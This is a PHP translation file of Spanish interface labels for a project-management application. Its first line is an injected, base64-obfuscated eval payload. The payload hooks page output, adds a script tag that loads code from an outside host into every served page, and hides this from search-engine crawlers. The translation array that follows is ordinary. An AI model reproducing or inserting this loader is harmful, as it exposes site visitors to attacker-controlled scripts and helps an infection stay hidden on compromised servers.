<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php

  return array(
  
    // Objects
    'user' => 'Usuario',
    'group' => 'Grupo',
    'groups' => 'Grupos',
    'users' => 'Usuarios',
    'member' => 'Miembro',
    'members' => 'Miembros',
    'company' => 'Empresa',
    'companies' => 'Empresa',
    'client' => 'Cliente',
    'clients' => 'Clientes',
    'package' => 'Paquete',
    'project' => 'Espacio',
    'projects' => 'Espacio',
    'message' => 'Nota',
    'messages' => 'Notas',
    'comment' => 'Comentario',
    'comments' => 'Comentarios',
    'milestone' => 'Hito',
    'milestones' => 'Hitos',
    'task' => 'Tarea',
    'subtasks' => 'Subtareas',
    'tasks' => 'Tareas',
    'task list' => 'Tarea',
    'task lists' => 'Tareas',
    'tag' => 'Etiquetar',
    'tags' => 'Etiquetas',
    'attachment' => 'Adjunto',
    'attachments' => 'Adjunto',
    'object subscribers' => 'Suscriptores',
    'form' => 'Formulario',
    'forms' => 'Formularios',
    'file' => 'Archivo',
    'files' => 'Archivos',
    'file revision' => 'Revisión de archivo',
    'file revisions' => 'Revisión de archivos',
    'revision' => 'Revisión',
    'revisions' => 'Revisiones',
    'folder' => 'Carpeta',
    'folders' => 'Carpetas',
    'configuration category' => 'Configuración de categoría',
    'configuration categories' => 'Configuración de categorías',
    'handin' => 'Entregable',
    'handins' => 'Entregables',
	'emailunclassified' => 'Correo',
    
    // Variations
    'owner company' => 'Empresa propietaria',
  	'client companies' => 'Empresas clientes',
    
    'open milestone' => 'Abrir hito',
    'open milestones' => 'Abrir hitos',
    'completed milestone' => 'Hito completado',
    'completed milestones' => 'Hitos completado',
    'late milestones' => 'Hito tardío',
    'late milestones and tasks' => 'Hitos y tareas atrasadas',
    'today milestones' => 'Hitos de hoy',
    'upcoming milestones' => 'Hitos recibidos',
    'completed task list' => 'Tarea completada',
    'completed task lists' => 'Tareas completadas',
    'open task list' => 'Abrir tarea',
    'open task lists' => 'Abrir tareas',
    'active project' => 'Espacio activo',
    'active projects' => 'Espacios activos',
    'finished project' => 'Espacio cerrado',
    'finished projects' => 'Espacios cerrados',
    'linked object' => 'Objeto vinculado',
    'linked objects' => 'Objetos vinculados',
    
    'important message'  => 'Nota importante',
    'important messages' => 'Notas importantes',
    'important file'     => 'Archivo importante',
    'important files'    => 'Archivos importante',
    'parent task'    => 'Tarea padre',
    
    'private message' => 'Nota privada',
    'private milestone' => 'Hito privado',
    'private task list' => 'Tareas privadas',
    'private comment' => 'Comentario privado',
    'private file' => 'Archivo privado',
  	'file contents' => 'Contenido del archivo',
  
  	'object reminders' => 'Recordatorios',
    'add object reminder' => 'Agregar recordatorio',
    
  ); // array

?>